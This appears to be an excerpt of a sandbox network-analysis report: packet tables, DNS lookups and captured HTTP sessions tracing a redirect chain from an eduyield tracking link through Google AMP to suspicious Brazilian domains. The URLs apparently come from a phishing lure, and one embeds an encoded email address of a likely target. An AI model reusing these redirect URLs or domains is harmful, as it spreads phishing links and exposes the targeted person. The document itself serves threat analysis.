                      Aug 29, 2024 20:55:50.812252998 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.812297106 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.813035965 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.813054085 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.813150883 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.813158989 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.813205957 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.816710949 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.877779961 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.877803087 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.877882957 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.877893925 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.877943993 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.878650904 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.878664970 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.878729105 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.878736019 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.878814936 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.879450083 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.879466057 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.879528046 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.879534960 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.879576921 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.880640984 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.880655050 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.880744934 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.880752087 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.880804062 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.881582022 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.881597996 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.881674051 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.881680965 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.881724119 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.882756948 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.882771969 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.882839918 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.882846117 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.882904053 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.883074999 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.883090019 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.883150101 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.883157969 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.883219957 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.883961916 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.883975983 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.884052992 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.884061098 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.884104967 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.902060032 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.961656094 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.961698055 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.961735964 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.961741924 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.961776972 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:50.961792946 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:50.961818933 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:51.078860044 CEST49747443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:55:51.078893900 CEST44349747164.90.176.213192.168.2.4
                      Aug 29, 2024 20:55:51.840204000 CEST49672443192.168.2.4173.222.162.32
                      Aug 29, 2024 20:55:51.840236902 CEST44349672173.222.162.32192.168.2.4
                      Aug 29, 2024 20:55:54.883189917 CEST4972380192.168.2.4163.171.128.244
                      Aug 29, 2024 20:55:54.888242960 CEST8049723163.171.128.244192.168.2.4
                      Aug 29, 2024 20:55:54.888326883 CEST4972380192.168.2.4163.171.128.244
                      Aug 29, 2024 20:56:25.527626038 CEST49735443192.168.2.4107.23.245.109
                      Aug 29, 2024 20:56:25.527643919 CEST44349735107.23.245.109192.168.2.4
                      Aug 29, 2024 20:56:34.523953915 CEST49746443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:56:34.523983002 CEST44349746164.90.176.213192.168.2.4
                      Aug 29, 2024 20:56:38.449917078 CEST4972480192.168.2.4163.171.128.244
                      Aug 29, 2024 20:56:38.455025911 CEST8049724163.171.128.244192.168.2.4
                      Aug 29, 2024 20:56:38.455085993 CEST4972480192.168.2.4163.171.128.244
                      Aug 29, 2024 20:56:42.419753075 CEST49735443192.168.2.4107.23.245.109
                      Aug 29, 2024 20:56:42.419855118 CEST44349735107.23.245.109192.168.2.4
                      Aug 29, 2024 20:56:42.419946909 CEST49735443192.168.2.4107.23.245.109
                      Aug 29, 2024 20:56:42.653667927 CEST49757443192.168.2.4142.250.185.228
                      Aug 29, 2024 20:56:42.653702021 CEST44349757142.250.185.228192.168.2.4
                      Aug 29, 2024 20:56:42.653937101 CEST49757443192.168.2.4142.250.185.228
                      Aug 29, 2024 20:56:42.654043913 CEST49757443192.168.2.4142.250.185.228
                      Aug 29, 2024 20:56:42.654057980 CEST44349757142.250.185.228192.168.2.4
                      Aug 29, 2024 20:56:43.316251993 CEST44349757142.250.185.228192.168.2.4
                      Aug 29, 2024 20:56:43.316534042 CEST49757443192.168.2.4142.250.185.228
                      Aug 29, 2024 20:56:43.316554070 CEST44349757142.250.185.228192.168.2.4
                      Aug 29, 2024 20:56:43.316827059 CEST44349757142.250.185.228192.168.2.4
                      Aug 29, 2024 20:56:43.317214966 CEST49757443192.168.2.4142.250.185.228
                      Aug 29, 2024 20:56:43.317269087 CEST44349757142.250.185.228192.168.2.4
                      Aug 29, 2024 20:56:43.358967066 CEST49757443192.168.2.4142.250.185.228
                      Aug 29, 2024 20:56:49.380577087 CEST44349746164.90.176.213192.168.2.4
                      Aug 29, 2024 20:56:49.380669117 CEST44349746164.90.176.213192.168.2.4
                      Aug 29, 2024 20:56:49.380737066 CEST49746443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:56:50.419805050 CEST49746443192.168.2.4164.90.176.213
                      Aug 29, 2024 20:56:50.419857025 CEST44349746164.90.176.213192.168.2.4
                      Aug 29, 2024 20:56:53.216341972 CEST44349757142.250.185.228192.168.2.4
                      Aug 29, 2024 20:56:53.216389894 CEST44349757142.250.185.228192.168.2.4
                      Aug 29, 2024 20:56:53.216459036 CEST49757443192.168.2.4142.250.185.228
                      Aug 29, 2024 20:56:54.420500994 CEST49757443192.168.2.4142.250.185.228
                      Aug 29, 2024 20:56:54.420531988 CEST44349757142.250.185.228192.168.2.4
                      TimestampSource PortDest PortSource IPDest IP
                      Aug 29, 2024 20:55:38.148050070 CEST53655241.1.1.1192.168.2.4
                      Aug 29, 2024 20:55:38.148276091 CEST53603111.1.1.1192.168.2.4
                      Aug 29, 2024 20:55:39.227493048 CEST53577201.1.1.1192.168.2.4
                      Aug 29, 2024 20:55:39.737953901 CEST5363053192.168.2.41.1.1.1
                      Aug 29, 2024 20:55:39.738153934 CEST5832153192.168.2.41.1.1.1
                      Aug 29, 2024 20:55:39.755132914 CEST53583211.1.1.1192.168.2.4
                      Aug 29, 2024 20:55:39.756931067 CEST53536301.1.1.1192.168.2.4
                      Aug 29, 2024 20:55:40.562952042 CEST5251253192.168.2.41.1.1.1
                      Aug 29, 2024 20:55:40.563113928 CEST5575553192.168.2.41.1.1.1
                      Aug 29, 2024 20:55:40.572577953 CEST53557551.1.1.1192.168.2.4
                      Aug 29, 2024 20:55:40.572700977 CEST53525121.1.1.1192.168.2.4
                      Aug 29, 2024 20:55:40.574393034 CEST5858953192.168.2.41.1.1.1
                      Aug 29, 2024 20:55:40.574609995 CEST5589153192.168.2.41.1.1.1
                      Aug 29, 2024 20:55:40.581312895 CEST53585891.1.1.1192.168.2.4
                      Aug 29, 2024 20:55:40.582004070 CEST53558911.1.1.1192.168.2.4
                      Aug 29, 2024 20:55:41.661839008 CEST5862153192.168.2.41.1.1.1
                      Aug 29, 2024 20:55:41.662409067 CEST5232553192.168.2.41.1.1.1
                      Aug 29, 2024 20:55:41.668840885 CEST53586211.1.1.1192.168.2.4
                      Aug 29, 2024 20:55:41.669080973 CEST53523251.1.1.1192.168.2.4
                      Aug 29, 2024 20:55:42.602835894 CEST5982753192.168.2.41.1.1.1
                      Aug 29, 2024 20:55:42.603764057 CEST5162553192.168.2.41.1.1.1
                      Aug 29, 2024 20:55:42.609837055 CEST53598271.1.1.1192.168.2.4
                      Aug 29, 2024 20:55:42.610655069 CEST53516251.1.1.1192.168.2.4
                      Aug 29, 2024 20:55:44.068468094 CEST5810553192.168.2.41.1.1.1
                      Aug 29, 2024 20:55:44.069775105 CEST6363653192.168.2.41.1.1.1
                      Aug 29, 2024 20:55:44.077169895 CEST53581051.1.1.1192.168.2.4
                      Aug 29, 2024 20:55:44.463423014 CEST53636361.1.1.1192.168.2.4
                      Aug 29, 2024 20:55:48.391925097 CEST5606953192.168.2.41.1.1.1
                      Aug 29, 2024 20:55:48.392189980 CEST5857553192.168.2.41.1.1.1
                      Aug 29, 2024 20:55:48.775193930 CEST53560691.1.1.1192.168.2.4
                      Aug 29, 2024 20:55:49.347513914 CEST53585751.1.1.1192.168.2.4
                      Aug 29, 2024 20:55:50.143605947 CEST138138192.168.2.4192.168.2.255
                      Aug 29, 2024 20:55:56.392741919 CEST53534561.1.1.1192.168.2.4
                      Aug 29, 2024 20:56:15.396338940 CEST53607391.1.1.1192.168.2.4
                      Aug 29, 2024 20:56:38.066056013 CEST53578501.1.1.1192.168.2.4
                      Aug 29, 2024 20:56:38.273346901 CEST53545541.1.1.1192.168.2.4
                      Timestamp | Source IP | Dest IP | Checksum | Code | Type
                      Aug 29, 2024 20:55:44.463495016 CEST | 192.168.2.4 | 1.1.1.1 | c248 | (Port unreachable) | Destination Unreachable
                      Aug 29, 2024 20:55:49.347613096 CEST | 192.168.2.4 | 1.1.1.1 | c259 | (Port unreachable) | Destination Unreachable
                      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                      Aug 29, 2024 20:55:39.737953901 CEST | 192.168.2.4 | 1.1.1.1 | 0xefe8 | Standard query (0) | emp.eduyield.com | A (IP address) | IN (0x0001) | false
                      Aug 29, 2024 20:55:39.738153934 CEST | 192.168.2.4 | 1.1.1.1 | 0xbb96 | Standard query (0) | emp.eduyield.com | 65 | IN (0x0001) | false
                      Aug 29, 2024 20:55:40.562952042 CEST | 192.168.2.4 | 1.1.1.1 | 0x1bcd | Standard query (0) | google.com | A (IP address) | IN (0x0001) | false
                      Aug 29, 2024 20:55:40.563113928 CEST | 192.168.2.4 | 1.1.1.1 | 0x9130 | Standard query (0) | google.com | 65 | IN (0x0001) | false
                      Aug 29, 2024 20:55:40.574393034 CEST | 192.168.2.4 | 1.1.1.1 | 0x35f7 | Standard query (0) | google.com | A (IP address) | IN (0x0001) | false
                      Aug 29, 2024 20:55:40.574609995 CEST | 192.168.2.4 | 1.1.1.1 | 0x91c7 | Standard query (0) | google.com | 65 | IN (0x0001) | false
                      Aug 29, 2024 20:55:41.661839008 CEST | 192.168.2.4 | 1.1.1.1 | 0x55e5 | Standard query (0) | google.com | A (IP address) | IN (0x0001) | false
                      Aug 29, 2024 20:55:41.662409067 CEST | 192.168.2.4 | 1.1.1.1 | 0xc4a1 | Standard query (0) | google.com | 65 | IN (0x0001) | false
                      Aug 29, 2024 20:55:42.602835894 CEST | 192.168.2.4 | 1.1.1.1 | 0x5a48 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
                      Aug 29, 2024 20:55:42.603764057 CEST | 192.168.2.4 | 1.1.1.1 | 0x34a1 | Standard query (0) | www.google.com | 65 | IN (0x0001) | false
                      Aug 29, 2024 20:55:44.068468094 CEST | 192.168.2.4 | 1.1.1.1 | 0x55a8 | Standard query (0) | canoassuplementos.com.br | A (IP address) | IN (0x0001) | false
                      Aug 29, 2024 20:55:44.069775105 CEST | 192.168.2.4 | 1.1.1.1 | 0x92f6 | Standard query (0) | canoassuplementos.com.br | 65 | IN (0x0001) | false
                      Aug 29, 2024 20:55:48.391925097 CEST | 192.168.2.4 | 1.1.1.1 | 0xd47e | Standard query (0) | hdjdsigfhgejw.caririinovacao.com.br | A (IP address) | IN (0x0001) | false
                      Aug 29, 2024 20:55:48.392189980 CEST | 192.168.2.4 | 1.1.1.1 | 0x975d | Standard query (0) | hdjdsigfhgejw.caririinovacao.com.br | 65 | IN (0x0001) | false
                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                      Aug 29, 2024 20:55:39.756931067 CEST | 1.1.1.1 | 192.168.2.4 | 0xefe8 | No error (0) | emp.eduyield.com | | 107.23.245.109 | A (IP address) | IN (0x0001) | false
                      Aug 29, 2024 20:55:39.756931067 CEST | 1.1.1.1 | 192.168.2.4 | 0xefe8 | No error (0) | emp.eduyield.com | | 3.211.51.78 | A (IP address) | IN (0x0001) | false
                      Aug 29, 2024 20:55:39.756931067 CEST | 1.1.1.1 | 192.168.2.4 | 0xefe8 | No error (0) | emp.eduyield.com | | 54.165.150.163 | A (IP address) | IN (0x0001) | false
                      Aug 29, 2024 20:55:40.572577953 CEST | 1.1.1.1 | 192.168.2.4 | 0x9130 | No error (0) | google.com | | | 65 | IN (0x0001) | false
                      Aug 29, 2024 20:55:40.572700977 CEST | 1.1.1.1 | 192.168.2.4 | 0x1bcd | No error (0) | google.com | | 142.250.181.238 | A (IP address) | IN (0x0001) | false
                      Aug 29, 2024 20:55:40.581312895 CEST | 1.1.1.1 | 192.168.2.4 | 0x35f7 | No error (0) | google.com | | 142.250.185.110 | A (IP address) | IN (0x0001) | false
                      Aug 29, 2024 20:55:40.582004070 CEST | 1.1.1.1 | 192.168.2.4 | 0x91c7 | No error (0) | google.com | | | 65 | IN (0x0001) | false
                      Aug 29, 2024 20:55:41.668840885 CEST | 1.1.1.1 | 192.168.2.4 | 0x55e5 | No error (0) | google.com | | 142.250.181.238 | A (IP address) | IN (0x0001) | false
                      Aug 29, 2024 20:55:41.669080973 CEST | 1.1.1.1 | 192.168.2.4 | 0xc4a1 | No error (0) | google.com | | | 65 | IN (0x0001) | false
                      Aug 29, 2024 20:55:42.609837055 CEST | 1.1.1.1 | 192.168.2.4 | 0x5a48 | No error (0) | www.google.com | | 142.250.185.228 | A (IP address) | IN (0x0001) | false
                      Aug 29, 2024 20:55:42.610655069 CEST | 1.1.1.1 | 192.168.2.4 | 0x34a1 | No error (0) | www.google.com | | | 65 | IN (0x0001) | false
                      Aug 29, 2024 20:55:44.077169895 CEST | 1.1.1.1 | 192.168.2.4 | 0x55a8 | No error (0) | canoassuplementos.com.br | | 191.252.144.224 | A (IP address) | IN (0x0001) | false
                      Aug 29, 2024 20:55:48.775193930 CEST | 1.1.1.1 | 192.168.2.4 | 0xd47e | No error (0) | hdjdsigfhgejw.caririinovacao.com.br | | 164.90.176.213 | A (IP address) | IN (0x0001) | false
                      Aug 29, 2024 20:55:53.049932003 CEST | 1.1.1.1 | 192.168.2.4 | 0x9e33 | No error (0) | www.download.windowsupdate.com.download.ks-cdn.com | k256-all.gslb.ksyuncdn.com | | CNAME (Canonical name) | IN (0x0001) | false
                      Aug 29, 2024 20:55:53.049932003 CEST | 1.1.1.1 | 192.168.2.4 | 0x9e33 | No error (0) | k256-all.gslb.ksyuncdn.com | | 125.39.194.1 | A (IP address) | IN (0x0001) | false
                      Aug 29, 2024 20:55:53.049932003 CEST | 1.1.1.1 | 192.168.2.4 | 0x9e33 | No error (0) | k256-all.gslb.ksyuncdn.com | | 42.56.77.10 | A (IP address) | IN (0x0001) | false
                      Aug 29, 2024 20:55:53.049932003 CEST | 1.1.1.1 | 192.168.2.4 | 0x9e33 | No error (0) | k256-all.gslb.ksyuncdn.com | | 183.61.168.1 | A (IP address) | IN (0x0001) | false
                      Aug 29, 2024 20:55:53.049932003 CEST | 1.1.1.1 | 192.168.2.4 | 0x9e33 | No error (0) | k256-all.gslb.ksyuncdn.com | | 183.61.243.1 | A (IP address) | IN (0x0001) | false
                      Aug 29, 2024 20:55:53.049932003 CEST | 1.1.1.1 | 192.168.2.4 | 0x9e33 | No error (0) | k256-all.gslb.ksyuncdn.com | | 113.16.211.7 | A (IP address) | IN (0x0001) | false
                      Aug 29, 2024 20:55:53.049932003 CEST | 1.1.1.1 | 192.168.2.4 | 0x9e33 | No error (0) | k256-all.gslb.ksyuncdn.com | | 175.6.254.70 | A (IP address) | IN (0x0001) | false
                      Aug 29, 2024 20:55:53.049932003 CEST | 1.1.1.1 | 192.168.2.4 | 0x9e33 | No error (0) | k256-all.gslb.ksyuncdn.com | | 183.131.56.5 | A (IP address) | IN (0x0001) | false
                      Aug 29, 2024 20:55:53.049932003 CEST | 1.1.1.1 | 192.168.2.4 | 0x9e33 | No error (0) | k256-all.gslb.ksyuncdn.com | | 124.225.141.1 | A (IP address) | IN (0x0001) | false
                      Aug 29, 2024 20:55:53.049932003 CEST | 1.1.1.1 | 192.168.2.4 | 0x9e33 | No error (0) | k256-all.gslb.ksyuncdn.com | | 118.112.233.1 | A (IP address) | IN (0x0001) | false
                      Aug 29, 2024 20:55:53.049932003 CEST | 1.1.1.1 | 192.168.2.4 | 0x9e33 | No error (0) | k256-all.gslb.ksyuncdn.com | | 163.177.116.4 | A (IP address) | IN (0x0001) | false
                      Aug 29, 2024 20:55:57.134439945 CEST | 1.1.1.1 | 192.168.2.4 | 0xf04a | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false
                      Aug 29, 2024 20:55:57.134439945 CEST | 1.1.1.1 | 192.168.2.4 | 0xf04a | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.221.95 | A (IP address) | IN (0x0001) | false
                      Aug 29, 2024 20:56:11.488559008 CEST | 1.1.1.1 | 192.168.2.4 | 0x6ab8 | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false
                      Aug 29, 2024 20:56:11.488559008 CEST | 1.1.1.1 | 192.168.2.4 | 0x6ab8 | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.221.95 | A (IP address) | IN (0x0001) | false
                      Aug 29, 2024 20:56:30.580362082 CEST | 1.1.1.1 | 192.168.2.4 | 0x8d1a | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false
                      Aug 29, 2024 20:56:30.580362082 CEST | 1.1.1.1 | 192.168.2.4 | 0x8d1a | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.221.95 | A (IP address) | IN (0x0001) | false
                      Aug 29, 2024 20:56:51.098131895 CEST | 1.1.1.1 | 192.168.2.4 | 0xa8a3 | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false
                      Aug 29, 2024 20:56:51.098131895 CEST | 1.1.1.1 | 192.168.2.4 | 0xa8a3 | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.221.95 | A (IP address) | IN (0x0001) | false
                      • emp.eduyield.com
                      • google.com.
                      • google.com
                      • www.google.com
                      • fs.microsoft.com
                      • canoassuplementos.com.br
                      • https:
                        • hdjdsigfhgejw.caririinovacao.com.br
                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      0 | 192.168.2.4 | 49736 | 107.23.245.109 | 443 | 5768 | C:\Program Files\Google\Chrome\Application\chrome.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2024-08-29 18:55:40 UTC | 854 | OUT | GET /el?aid=2t26dda0e6c-1865-11ef-80aa-0217a07992df&rid=33766156&pid=771868&cid=497&dest=google.com.////amp/s/canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%A3%E2%82%AC%E2%80%9A HTTP/1.1
                      Host: emp.eduyield.com
                      Connection: keep-alive
                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      sec-ch-ua-mobile: ?0
                      sec-ch-ua-platform: "Windows"
                      Upgrade-Insecure-Requests: 1
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Sec-Fetch-Site: none
                      Sec-Fetch-Mode: navigate
                      Sec-Fetch-User: ?1
                      Sec-Fetch-Dest: document
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2024-08-29 18:55:40 UTC | 285 | IN | HTTP/1.1 303 See Other
                      Date: Thu, 29 Aug 2024 18:55:40 GMT
                      Content-Type: text/html; charset=UTF-8
                      Content-Length: 0
                      Connection: close
                      Server: nginx/1.27.1
                      Location: http://google.com.////amp/s/canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      1 | 192.168.2.4 | 49738 | 142.250.185.110 | 443 | 5768 | C:\Program Files\Google\Chrome\Application\chrome.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2024-08-29 18:55:41 UTC | 777 | OUT | GET ////amp/s/canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A HTTP/1.1
                      Host: google.com.
                      Connection: keep-alive
                      Upgrade-Insecure-Requests: 1
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Sec-Fetch-Site: none
                      Sec-Fetch-Mode: navigate
                      Sec-Fetch-User: ?1
                      Sec-Fetch-Dest: document
                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      sec-ch-ua-mobile: ?0
                      sec-ch-ua-platform: "Windows"
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2024-08-29 18:55:41 UTC | 413 | IN | HTTP/1.1 301 Moved Permanently
                      Cache-Control: private
                      Content-Type: text/html; charset=UTF-8
                      Referrer-Policy: no-referrer
                      Location: https://google.com/amp/s/canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A
                      Content-Length: 336
                      Date: Thu, 29 Aug 2024 18:55:41 GMT
                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                      Connection: close
                      2024-08-29 18:55:41 UTC | 336 | IN | Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="https://google.com/amp/s/canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jY


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      2 | 192.168.2.4 | 49740 | 142.250.181.238 | 443 | 5768 | C:\Program Files\Google\Chrome\Application\chrome.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2024-08-29 18:55:42 UTC | 773 | OUT | GET /amp/s/canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A HTTP/1.1
                      Host: google.com
                      Connection: keep-alive
                      Upgrade-Insecure-Requests: 1
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Sec-Fetch-Site: none
                      Sec-Fetch-Mode: navigate
                      Sec-Fetch-User: ?1
                      Sec-Fetch-Dest: document
                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      sec-ch-ua-mobile: ?0
                      sec-ch-ua-platform: "Windows"
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2024-08-29 18:55:42 UTC | 957 | IN | HTTP/1.1 301 Moved Permanently
                      Location: https://www.google.com/amp/s/canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A
                      Content-Type: text/html; charset=UTF-8
                      Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-QRgn5ZAcsVBK3RcNCU-wHw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                      Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                      Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                      Permissions-Policy: unload=()
                      Date: Thu, 29 Aug 2024 18:55:42 GMT
                      Expires: Sat, 28 Sep 2024 18:55:42 GMT
                      Cache-Control: public, max-age=2592000
                      Server: gws
                      Content-Length: 340
                      X-XSS-Protection: 0
                      X-Frame-Options: SAMEORIGIN
                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                      Connection: close
                      2024-08-29 18:55:42 UTC | 340 | IN | Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="https://www.google.com/amp/s/canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vb


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      3 | 192.168.2.4 | 49741 | 142.250.185.228 | 443 | 5768 | C:\Program Files\Google\Chrome\Application\chrome.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2024-08-29 18:55:43 UTC | 777 | OUT | GET /amp/s/canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$%C3%83%C2%A3%C3%A2%C2%82%C2%AC%C3%A2%C2%80%C2%9A HTTP/1.1
                      Host: www.google.com
                      Connection: keep-alive
                      Upgrade-Insecure-Requests: 1
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Sec-Fetch-Site: none
                      Sec-Fetch-Mode: navigate
                      Sec-Fetch-User: ?1
                      Sec-Fetch-Dest: document
                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      sec-ch-ua-mobile: ?0
                      sec-ch-ua-platform: "Windows"
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2024-08-29 18:55:43 UTC | 1232 | IN | HTTP/1.1 302 Found
                      Location: https://canoassuplementos.com.br//////dayo/xljj3/bWZlcmVzQHBlby5vbi5jYQ==$
                      Cache-Control: private
                      X-Robots-Tag: noindex
                      Content-Type: text/html; charset=UTF-8
                      Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-pPHv8whueIE_6eKb1ffnsA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                      Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
